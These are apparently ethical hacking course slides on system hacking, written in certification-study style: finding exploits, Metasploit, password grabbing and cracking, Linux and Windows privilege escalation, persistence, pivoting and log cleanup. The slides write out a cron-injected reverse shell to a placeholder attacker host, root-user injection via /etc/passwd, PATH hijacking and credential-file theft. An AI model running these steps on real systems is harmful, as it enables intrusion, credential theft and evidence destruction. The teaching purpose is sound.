System Hacking PDF

Summary

This document provides an overview of system hacking techniques, including locating exploits, using Metasploit for exploitation, cracking passwords, privilege escalation and maintaining access.

Full Transcript

Ethical Hacker
Course
System Hacking

CEHv10 Certified Ethical Hacker Exam Study Guide
Edited by Djohara Benyamina
Agenda

EXPLOITS EXPLOITATION PASSWORD POST
TOOLS CRACKING EXPLOITATION
Exploits

A vulnerability is a An exploit is taking
weakness in a system or advantage of that
piece of software vulnerability

Exploits are also not
Exploits can have multiple
always technical – humans
outcomes – it isn’t always
are vulnerable and can be
shell access
exploited
 Locating exploits

Often exploits are available publicly
Many repositories for exploits, including some you shouldn’t
trust (anything on the Tor network)
Exploit-db.org is a trustworthy repository of exploits
These are often considered proof of concept (PoC), just to
demonstrate a vulnerability can be exploited
Local copy of the Exploit-DB can be installed on Linux
systems, with search tool – Use searchsploit –m to get the
exploit
Locating an exploit script on Kali
Locating an exploit script on Exploit-DB
Search a vulnerability exploit from Exploit-DB
Locate the script- choose raw {}
Copy the link
On Kali wget

 Locating an exploit script on Github
Example of exploit from Github https://github.com/carlospolop/PEASS-
ng/blob/master/winPEAS/winPEASbat/winPEAS.bat
Click on raw
Copy the URL
From Kali
# wget
Exploitation Tools

Many common exploitation tools, including Metasploit

Metasploit has modules that can exploit vulnerabilities

Commonly, modules target well-known vulnerabilities

Modules are generally architecture and OS specific
 Payloads

Not all payloads are
Payloads are operating
The payload is the part created equal, this has
system and architecture
of the exploit that is the to do with size
(64-bit vs 32-bit)
code you want run constraints on the
specific
payload

Meterpreter provides
Metasploit has a
common functions that
custom payload called
you’d use at the OS
Meterpreter
level
 Using Metasploit

Command line-oriented program is msfconsole, comes
installed in Kali Linux, ParrotOS (Linux) and Commando VM
(Windows)
You can get a Web interface by downloading from Rapid7
Inside msfconsole, you search for modules using either their
name, platform, CVE # or other identifying information
Variables are set using set LVAR val
When all necessary variables are set, use exploit or run
 Cracking passwords is a common technique that you
would use after gaining access to a system

John the Ripper is a common password cracking tool

Cracking John supports multiple cracking methods
Passwords
Rainbow Tables can be much faster since the password
hashes are pre-computed, but they take up enormous
disk space

Mimikatz is a program (and Metasploit module) that
can help with password cracking and is very commonly
used by attackers
 You need passwords before cracking, so you
need to pull them from your infiltrated system

Linux would commonly be /etc/shadow and
/etc/passwd is useful as well
Grabbing
Passwords Windows uses the Security Account Manager
(SAM), where passwords are stored in the
registry
Passwords can also be pulled from memory,
which mimikatz is good at
 Password gathering technique on
Windows networks
Kerberos is authorization protocol, using
client-server model
Kerberoasting requires a compromised
Kerberoasting account on a victim computer
Used to forge credentials to gain access
to another system using a ticket-granting
ticket
 Grab passwords

Escalate privileges

Post
Exploitation Perform reconnaissance
on other systems

Investigate filesystem for
juicy information (like
passwords written in a
text file) or RSA keys

Meterpreter allows you to
get a screen capture of
the running desktop for
proof of access
 Privilege Escalation
Escalating privileges is often necessary since most
accounts will have limited permissions (principle of
least privilege)
Privilege escalation is obtaining administrator
privileges from a non-privileged account
Will typically require a local vulnerability that will
result in administrator access
Keep in mind that all processes run with the security
context of the user that owns the process
Privilege Escalation
It can be Horizontal privilege escalation or Vertical privilege escalation
(privilege elevation)
Horizontal: User to User , Vertical: User to Admin(root)
A. Linux platform – Manual Enumeration
1. Exploit a writable /etc/passwd – add a new line for a user with a
hash you create and set UID, GID and shell to root
- Command to create a hash for a password "openssl passwd -1 -salt [salt] [password]
Privilege Escalation cont.

Sudo –l :List what commands you're able to use as root on that account
How to exploit these commands? see exploits on https://gtfobins.github.io/

SUID – look for file with SUID – capabilities- files to be run as root
Command to display capabilities :
find / -perm -u=s -type f 2>/dev/null
Look for exploits on https://gtfobins.github.io/
Privilege Escalation cont.
Cron table- The Cron daemon is a long-running process that executes
commands at specific dates and times
cat /etc/crontab to see active cron jobs
Exploit the Cron table for privilege elevation
Example: There is a script owned by root to be executed every 5 min named
autoscript.sh
Steps: Create a payload using one of the previous methods from Lab7
msfvenom -p cmd/unix/reverse_netcat lhost=KaliLIP lport=8888

echo [MSFVENOM OUTPUT] > autoscript.sh
wait for cron to execute the file , and start a netcat listener using: "nc -lvnp 8888"
Privilege Escalation cont.
PATH variable: can be exploited to elevate privileges by imitating an
executable if its absolute path is not defined.
Steps:
echo $PATH
echo "[whatever command we want to run]" > [name of the
executable we're imitating]
Save it in a folder /tmp and make it executable.
Add the folder to PATH with the command export PATH=/tmp:$PATH
Privilege Escalation cont.
Using LinEnum to run commands related to privilege escalation
You can download a local copy of LinEnum using wget -raw
https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
Start a Python HTTP server on Kali, default port is 8000

From the victim machine get the script from kali

run the script
Privilege Escalation Using LinEnum

- Get a foothold in the target then try to escalate privileges - Make the script executable

A segment of LinEnum’s Output
Privilege Escalation cont.
B. Windows platform – Manual Enumeration
User Enumeration:Start by enumerating users and their privileges on the target system.
Current user’s privileges: >whoami /priv
List users: >net users
List details of a user:> net user username
Search for text files containing “password” string: >findstr /si password *.txt
Mimikatz to retrieve the NTLM password hash for a domain admin
Collect system info: >systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Look for Open shares –SMB – use Enum4Linux
Credentials hunting and abusing account privileges – Through accessing database servers and using
Hydra
Look for unquoted service pack and replace the legitimate application with a malicious one
> wmic service list brief | findstr "Running"
A scheduled task that run at predefined times with a privileged account can be modified. The schtasks
command can be used to query scheduled tasks. schtasks /query /fo LIST /v
 Privilege Escalation cont.
If Meterpreter shell on the target system, you can use the multi/recon/local_exploit_suggester
module to list vulnerabilities that may allow you to elevate your privileges
Many tools are available online to assist with enumerating Windows systems for common and
obscure privilege escalation vectors.
Tool Description
Seatbelt C# project for performing a wide variety of local privilege escalation checks
winPEAS Script that searches for possible paths to escalate privileges on Windows hosts.
PowerUp Common Windows privilege escalation vectors that rely on misconfigurations
SharpUp C# version of PowerUp
JAWS PowerShell script for enumerating privilege escalation vectors written in PowerShell2.0
Maintaining Access

Persistence involves retaining access over time
Common techniques include:
Adding a scheduled job or task – See crontab
Installing services or daemons
Installing a backdoor or trojan
Creating a new user – useradd
Create RSA keys on Kali- send Public key to Autorized-users on target then can ssh
with private key from Kali
Pivoting
Re-assess the surrounding network and systems using tools previously
used for reconnaissance
Identify new targets that are visible and repeat the processes used
thus far
Using Metasploit – autoroute to pivot to another system
Pivoting example
Cleanup
Identify changes and evidence of exploits and penetration
Remove or conceal the evidence
Destroy logs, files, user accounts
 Exploits take advantage of weaknesses in
systems or software (vulnerabilities)
Database of exploits is available at exploit-
db.org
Metasploit is a common exploit framework
Metasploit has many modules based on known
Summary vulnerabilities
Password cracking is a common tactic used after
gaining access to a system
Post exploitation activities include privilege
escalation, password grabbing, internal
reconnaissance, etc